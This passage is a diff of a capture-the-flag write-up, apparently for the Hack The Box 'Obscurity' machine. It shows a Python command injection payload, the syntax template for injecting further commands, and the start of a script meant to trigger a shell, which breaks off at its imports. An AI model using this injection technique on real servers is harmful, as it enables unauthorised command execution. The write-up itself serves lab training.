ongyuann/ongyuann.github.io/_posts/2020-05-29-htb-obscurity.md

 [+] exec
 a
 ```
+Attempted payload: `wow';print (%27a%27);'`
-Notice the `a` below the `[+] exec`.
+Notice the `a` below the `[+] exec`?
 We've successfully demonstrated command injection!
 Note here that we now have the syntax for our command injection: `"wow';<our-url-encoded-command>;'"`

-To get a shell back this way, we can automate this by Python - and if we use Python's `requests` module, we can take advantage of the fact that the `requests` module automatically URL-encodes inputs!
-Super convenient!
+To get a shell back this way, we can automate this by Python - and if we use Python's `requests` module, we can take advantage of the fact that the `requests` module automatically URL-encodes inputs.
+How convenient is that?

+Our `shell-trigger.py`:
 ```python
 kali@kali:~$ cat shell-trigger.py
 import requests